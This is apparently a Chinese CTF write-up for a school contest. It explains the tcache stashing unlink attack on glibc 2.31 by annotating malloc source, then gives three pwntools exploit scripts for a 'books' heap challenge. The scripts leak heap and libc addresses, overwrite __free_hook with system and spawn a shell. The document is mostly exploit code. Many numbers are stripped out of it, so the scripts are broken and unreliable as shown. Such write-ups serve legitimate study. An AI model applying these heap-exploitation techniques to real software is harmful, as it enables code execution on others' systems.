今年校赛有点可惜,最后两道质量不错的pwn每做出来,总的来说还是我太菜了,希望下次校赛能AK pwn题。不过这次校赛也没有白打,还是有学到新的东西的。在这里感谢出题的学长。

glibc-2.29以后unsortbin attack不能用了,不过可以通过把多余的chunk移入tcache实现。下面从源码分析一下具体原理。注意:接下来分析的源码版本都是glibc-2.31的。


    if (in_smallbin_range (nb))
idx = smallbin_index (nb);
bin = bin_at (av, idx); if ((victim = last (bin)) != bin)
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim)) //检测是否构成双向链表
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb); //给物理相邻的高地址chunk设置prev_inuse标志位 //将符合的chunk从链表中取出来
bin->bk = bck;
bck->fd = bin; if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) //需要mp_.tcache_count来推出循环,否则会报错
if (tc_victim != )
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb); //给物理相邻的高地址chunk设置prev_inuse标志位
if (av != &main_arena) //不是主分配区设置non_main_arena标志
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin; tcache_put (tc_victim, tc_idx);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;


假如有如左边的smallbin链表,如果我们修改chunk1的bk指针,使其指向target address-0x10,接下来malloc(chunk2)。由于smallbin还有剩下的chunk,所以会把剩余的chunk放入tcahce。这时就可以在target address处写入smallbin的地址。

  • 为了防止程序崩溃,对应大小tcahce bin中必须已有6个chunk,即stash一个chunk后就会因tachce bin满了结束stash。
  • 在修改chunk1的bk指针时不能破坏fd指针,所以这个利用方法一般要求能泄漏heap_base。


程序就不分析了,总体的利用思路就是利用tcache stashing unlink attack修改大小,然后绕过验证,利用malloc函数实现在__free_hook中写入system。然后getshell。脚本如下:

#-*- coding:utf- -*-
from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])
p = process('./books')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') p.sendlineafter('name? ', 'yuan') def Buy(index, size, content):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index))
p.sendlineafter('content? ', str(size))
p.sendafter('input your content: ', content)
p.sendlineafter('want a receipt? [y/n] ', 'n') def Sell(index):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index)) def Write(index, content):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index))
p.sendafter('content: ', content) def Read(index):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index)) def Magic(data):
p.sendlineafter('Your choice: ', str(0xdeadbeef))
p.sendafter('Here is a magic place.\n', data) Buy(, 0x120, 'AAAAA\n')
Buy(, 0x120, '/bin/sh\x00\n')
Sell() Write(, '\x00'*0x120)
Sell() Write(, '\x00'*0x120)
############################ leak heap_base ######################
p.recvuntil("book's content: ")
heap_base = u64(p.recv() + '\x00\x00') - 0x2d0
info("heap_base ==> " + hex(heap_base)) Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Sell() ################# leak libc_base #################
p.recvuntil("book's content: ") libc_base = u64(p.recv().ljust(, '\x00')) - 0x1ebbe0
info("libc_base ==> " + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
info("malloc_hook ==> " + hex(malloc_hook))
system_addr = libc_base + libc.sym['__libc_system']
info("system_addr ==> " + hex(system_addr))
free_hook = libc_base + libc.sym['__free_hook']
info("free_hook ==> " + hex(free_hook)) #布置好free_hook
Buy(, 0x233, 'AAAA\n')
Write(, p64(free_hook) + '\x00'* + '\n')
Buy(, 0x140, 'AAAA\n') #在tcache中放6个chunk,为下面tcache stash做准备
Buy(, 0x100, 'AAAA\n')
Buy(, 0x140, 'AAAA\n')
for i in range():
Write(, '\x00'*0x20 + '\n')
#接下来的目标是在smallbin中放入两个0x240大小的chunk for i in range():
Buy(, 0x310, 'AAAA\n')
Sell() for i in range():
Buy(, 0x310, 'AAAA\n')
Buy(, 0x200, 'AAAA\n') #防止free时被top chunk合并
Buy(, 0x200, 'AAAAA\n') #split chunk
Buy(, 0x110, '/bin/sh\x00\n') payload = '\x00'*0x200 + p64() + p64(0x111) + p64(heap_base+0x21f0) + p64(heap_base+0x44)
Write(, payload)
Buy(, 0x100, 'AAAA\n') #tcache stash
Magic(p64(system_addr) + '\x00\n') Sell()



#-*- coding:utf- -*-
from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])
p = process('./books')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') p.sendlineafter('name? ', 'yuan') def Buy(index, size, content):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index))
p.sendlineafter('content? ', str(size))
p.sendafter('input your content: ', content)
p.sendlineafter('want a receipt? [y/n] ', 'n') def Sell(index):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index)) def Write(index, content):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index))
p.sendafter('content: ', content) def Read(index):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index)) def Magic(data):
p.sendlineafter('Your choice: ', str(0xdeadbeef))
p.sendafter('Here is a magic place.\n', data) for i in range():
Buy(, 0x230, 'AAAA\n')
Sell() Buy(, 0x230, 'AAAAA\n')
Buy(, 0x100, 'AAAA\n')
Sell() Read()
p.recvuntil('content: ')
libc_base = u64(p.recv() + '\x00\x00') - 0x1ebbe0
info("libc_base ==> " + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system'] Write(, p64(free_hook) + '\x00\x00'* + '\n')
Buy(, 0x100, '/bin/sh\x00\n') Magic('AAAAA\n')
Magic(p64(system_addr)) Sell() p.interactive()


由于题目没有限制好,在malloc chunk时可以输入索引4,直接可以绕过小于5的限制,接下来的利用方法和解法二类似。

#-*- coding:utf- -*-
from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])
p = process('./books')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') p.sendlineafter('name? ', 'yuan') def Buy(index, size, content):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index))
p.sendlineafter('content? ', str(size))
p.sendafter('input your content: ', content)
p.sendlineafter('want a receipt? [y/n] ', 'n') def Sell(index):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index)) def Write(index, content):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index))
p.sendafter('content: ', content) def Read(index):
p.sendlineafter('Your choice: ', '')
p.sendlineafter('book? ', str(index)) def Magic(data):
p.sendlineafter('Your choice: ', str(0xdeadbeef))
p.sendafter('Here is a magic place.\n', data) Buy(, 0x233, 'AAAA\n')
Sell() Buy(, 0x120, 'AAAAA\n')
Buy(, 0x120, '/bin/sh\x00\n')
Sell() Write(, '\x00'*0x120)
Sell() Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Write(, '\x00'*0x120)
Sell() Write(, '\x00'*0x120)
p.recvuntil("book's content: ") libc_base = u64(p.recv().ljust(, '\x00')) - 0x1ebbe0
info("libc_base ==> " + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
info("malloc_hook ==> " + hex(malloc_hook))
system_addr = libc_base + libc.sym['__libc_system']
info("system_addr ==> " + hex(system_addr))
free_hook = libc_base + libc.sym['__free_hook']
info("free_hook ==> " + hex(free_hook)) Buy(, 0x233, 'AAAA\n')
Write(, p64(free_hook))
Buy(, 0x120, '/bin/sh\x00\n')
raw_input('@') Magic('AAAA\n')
Magic(p64(system_addr) + '\x00\n') Sell()

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